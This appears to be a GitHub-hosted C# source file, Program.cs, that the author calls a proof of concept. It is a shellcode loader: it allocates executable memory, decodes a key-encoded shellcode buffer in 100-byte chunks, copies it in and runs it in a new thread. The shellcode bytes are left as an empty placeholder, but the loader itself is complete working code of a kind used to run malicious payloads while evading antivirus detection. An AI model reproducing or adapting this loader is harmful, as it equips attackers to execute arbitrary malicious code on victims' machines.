-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathProgram.cs
96 lines (78 loc) · 2.43 KB
/
Program.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;
// Yes the code is shit, but meh so what - not like I have the whole day to write good pocs
namespace ConsoleApp1 {
class Program{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")]
static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();
// Yes the code is shit, but meh so what - not like I have the whole day to write good pocs
private static int jawohl(byte[] inputz, IntPtr addr, int position, int key)
{
int fixSize = 100;
byte[] slice = new byte[]{};
byte[] remainder = new byte[0];
int len = inputz.Length;
if(len > fixSize)
{
slice = new byte[fixSize];
for (int i = 0; i < fixSize; i++)
{
slice[i] = inputz[i];
}
remainder = new byte[len-fixSize];
for (int i = 0; i < len-fixSize; i++)
{
remainder[i] = inputz[i+fixSize];
}
}else
{
slice = new byte[len];
for (int i = 0; i < len; i++)
{
slice[i] = inputz[i];
}
}
// Decode the shellcode
for (int i = 0; i < slice.Length; i++)
{
slice[i] = (byte)(((uint)slice[i] - key) & 0xFF);
}
IntPtr ptr;
if(position == 0)
{
ptr = addr;
}else
{
ptr = IntPtr.Add(addr, fixSize);
}
Marshal.Copy(slice, 0, ptr, slice.Length);
if(len > fixSize)
{
position += fixSize;
jawohl(remainder, ptr, position, key);
}
return len;
}
static void Main(string[] args)
{
byte[] buf = new byte[] { /* shellcode */ };
int key = 666; // key used to encode the shellcode
int size = buf.Length;
IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)size, 0x3000, 0x40);
jawohl(buf, addr, 0, key);
IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
WaitForSingleObject(hThread, 0xFFFFFFFF); // wait for shellcode to finish execution
}
}
}